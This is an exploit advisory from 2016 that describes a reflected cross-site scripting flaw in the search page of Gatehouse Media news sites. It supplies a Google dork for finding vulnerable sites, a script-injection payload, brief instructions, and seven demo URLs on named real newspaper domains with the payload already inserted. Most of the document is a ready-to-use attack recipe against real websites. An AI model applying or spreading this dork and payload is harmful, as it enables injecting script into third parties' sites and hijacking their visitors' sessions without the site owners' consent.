######################
# Exploit Title : Gatehouse Media Cross Site Scripting
# Exploit Author : Darkcrew.Org
# Google Dork : inurl:/search/?q= intext:© Copyright 2006-2016 Gatehouse Media, Inc.
# Date: 20.06.2016
# Contact: sultan.ahmir1997@yandex.com
######################
# Vulnerable File : /search/?q=
# Payload : "/></script><script>alert(/MirSultan/)</script>
# Describe : Search dork and select Target. Put /search/?q= After url such as :
# http://site.com/search/?q=
# Send data(Payload) with post method ... Ok
#
# Demo :
# http://www.heraldnews.com/search/?q="/></script><script>alert(/MirSultan/)</script>
# http://www.tauntongazette.com/search/?q="/></script><script>alert(/MirSultan/)</script>
# http://www.wickedlocal.com/search/?q="/></script><script>alert(/MirSultan/)</script>
# http://www.metrowestdailynews.com/search/?q="/></script><script>alert(/MirSultan/)</script>
# http://www.patriotledger.com/search/?q="/></script><script>alert(/MirSultan/)</script>
# http://www.enterprisenews.com/search/?q="/></script><script>alert(/MirSultan/)</script>
# http://www.milforddailynews.com/search/?q="/></script><script>alert(/MirSultan/)</script>
#
######################
# discovered by : Batur-ı Mir Sultan
######################